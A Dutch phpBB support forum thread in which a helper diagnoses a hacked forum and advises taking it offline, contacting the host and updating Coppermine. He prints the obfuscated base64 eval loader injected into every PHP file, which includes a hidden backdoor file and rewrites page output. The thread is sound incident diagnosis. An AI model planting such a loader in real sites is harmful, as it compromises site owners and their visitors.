Prive berichten

[Corryg60]

• Adres van je forum: http://www.north-tuning-projects.com
  Event. modificaties op je forum:
  Wanneer ontstond het probleem?01-03-2009
  phpBB versie: 3.0.4
  
  Heb je onlangs iets veranderd aan je forum?nee
  Wat is het probleem?

Hallo ik heb even een vraagje/probleempje we kunnen op ons forum geen prive berichten meer verwijderen
hij vraagt dan naar authenticate ? weet iemand hoe dit komt ?

alvast bedankt

Mvg robert

[Jim]

Wat is de exacte melding die je krijgt?

[Corryg60]

ik krijg wit beeld en vraagt naar authenticate

[Jim]

Een wit beeld ja, en nu graag de precieze melding die je erbij krijgt. Wat staat er op het scherm?

[Corryg60]

geeft verder helemaal geen melding alleen authenticate. En kan dan net als je inlogt iets invullen als ik mijn gegeven invul gebeurt er niks.

[Jim]

Oke, heb je nog iets gedaan voordat dit probleem ontstond of gebeurde het ineens?

[Corryg60]

nee heb verder niks gedaan is opeens gekomen

[Derky]

niemand ?

Het is niet de bedoeling dat er gebumpt wordt binnen 24 uur, ik heb je bericht verwijderd.

Over je probleem, kan je een test account voor ons aanmaken zodat we eens kunnen kijken?

[Corryg60]

niemand ?

Het is niet de bedoeling dat er gebumpt wordt binnen 24 uur, ik heb je bericht verwijderd.

Over je probleem, kan je een test account voor ons aanmaken zodat we eens kunnen kijken?

oke sorry had de regels niet goed door gelezen ik zal even een test acount aan maken zal ik die naar uw pmèn

[Corryg60]

Nog geen oplosing gevonden als ik de prive berichten open en ze 1 voor 1 verwijder wil het wel ?

[Derky]

Nou ik heb het één en ander eens even bekeken en heb slecht nieuws voor je. Je forum is gehacked.

Op 6 februari 2009 rond half 3 's middags zijn alle php bestanden op je website gewijzigd. Bij ieder bestand is schadelijke code toegevoegd, het bovenste stuk tot ?> is de schadelijke code.

Code: Selecteer alles

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9ub3J0aC10dW5pbmctcHJvamVjdHMuY29tL3d3dy9waHBCQjMvc3R5bGVzL1BsYXlTdGF0aW9uL3RoZW1lL2ltYWdlcy9tZW51L2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ub3J0aC10dW5pbmctcHJvamVjdHMuY29tL3d3dy9waHBCQjMvc3R5bGVzL1BsYXlTdGF0aW9uL3RoZW1lL2ltYWdlcy9tZW51L2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkZCl7JGY9b3JkKHN1YnN0cigkZCwzLDEpKTskaD0xMDskZT0wO2lmKCRmJjQpeyRlPXVucGFjaygndicsc3Vic3RyKCRkLDEwLDIpKTskZT0kZVsxXTskaCs9MiskZTt9aWYoJGYmOCl7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMTYpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjIpeyRoKz0yO30kdT1nemluZmxhdGUoc3Vic3RyKCRkLCRoKSk7aWYoJHU9PT1GQUxTRSl7JHU9JGQ7fXJldHVybiAkdTt9fWZ1bmN0aW9uIGRnb2JoKCRiKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskYz1nemRlY29kZSgkYik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJGMpKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkYyk7fWVsc2V7cmV0dXJuIGdtbCgpLiRjO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php
/**
*
* @package phpBB3
* @version $Id: index.php,v 1.176 2007/10/05 14:30:06 acydburn Exp $
* @copyright (c) 2005 phpBB Group
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
*
*/

Er zijn ook extra bestanden aangemaakt in de map:
/www/phpBB3/styles/PlayStation/theme/images/menu/
(Goed verstopt dus)
Deze fungeren als backdoor voor het uploaden van nog meer bestanden.
Deze bestanden worden ook weer gebruikt voor het spammen zie ik en wellicht ook weer voor het hacken van andere sites. Ik heb alvast de rechten voor die map weggehaald zodat daar niets meer geupload kan worden.

Ik zie dat je phpBB 3.0.0 gebruikt, de laatste versie is 3.0.4. Je loopt dus 4 versies achter. In deze 4 versies zijn geen exploits (veiligheidslekken) gevonden waarmee je dit kan doen. Gebruik je verder geen MODs voor phpBB3?
Ik vermoed dat het aan je Coppermine installatie ligt, daarvoor zijn recent wel exploits verschenen. (Remote PHP File Upload Vulnerability) Welke versie gebruik je van Coppermine?

Ik stel voor dat je de website offline haalt om eerst uit te zoeken waardoor het gekomen is. Neem ook contact op met je host zodat hun ook kunnen kijken of er verder nog schade is aangericht.

Voordat je alles hersteld eerst updaten naar de laatste versies! Vooral het Coppermine fotoalbum.